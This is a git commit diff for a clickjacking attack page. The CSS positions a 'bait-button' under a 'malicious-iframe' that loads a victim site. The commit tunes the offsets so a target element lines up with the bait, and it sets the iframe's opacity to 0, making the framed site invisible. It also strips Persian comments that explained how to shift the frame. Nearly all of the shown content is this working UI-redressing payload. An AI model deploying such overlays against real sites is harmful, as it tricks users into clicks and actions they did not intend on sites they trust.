Add
This commit is contained in:
parent
078785e04d
commit
f51fcb6843
|
|
@ -25,8 +25,8 @@
|
||||||
/* The innocent-looking button the victim wants to click */
|
/* The innocent-looking button the victim wants to click */
|
||||||
.bait-button {
|
.bait-button {
|
||||||
position: absolute;
|
position: absolute;
|
||||||
top: 319px;
|
top: 175px;
|
||||||
left: 292px;
|
left: 220px;
|
||||||
width: 200px;
|
width: 200px;
|
||||||
height: 50px;
|
height: 50px;
|
||||||
background-color: #22c55e;
|
background-color: #22c55e;
|
||||||
|
|
@ -42,18 +42,13 @@
|
||||||
/* The malicious iframe loading the victim site */
|
/* The malicious iframe loading the victim site */
|
||||||
.malicious-iframe {
|
.malicious-iframe {
|
||||||
position: absolute;
|
position: absolute;
|
||||||
|
|
||||||
/* ۱. فریم را بسیار بزرگ میکنیم تا کل صفحه قربانی رندر شود و به هم نریزد */
|
|
||||||
width: 1200px;
|
width: 1200px;
|
||||||
height: 1500px;
|
height: 1500px;
|
||||||
|
top: -404px;
|
||||||
/* ۲. با مقادیر منفی، فریم را به بالا و چپ هول میدهیم (مانند یک اسکرول مخفی) */
|
left: -580px;
|
||||||
top: -500px; /* این عدد را تغییر دهید تا صفحه به بالا/پایین حرکت کند */
|
|
||||||
left: -100px; /* این عدد را تغییر دهید تا صفحه به چپ/راست حرکت کند */
|
|
||||||
|
|
||||||
border: none;
|
border: none;
|
||||||
z-index: 2;
|
z-index: 2;
|
||||||
opacity: 0.4;
|
opacity: 0;
|
||||||
}
|
}
|
||||||
</style>
|
</style>
|
||||||
</head>
|
</head>
|
||||||
|
|
|
||||||
Loading…
Reference in New Issue
Block a user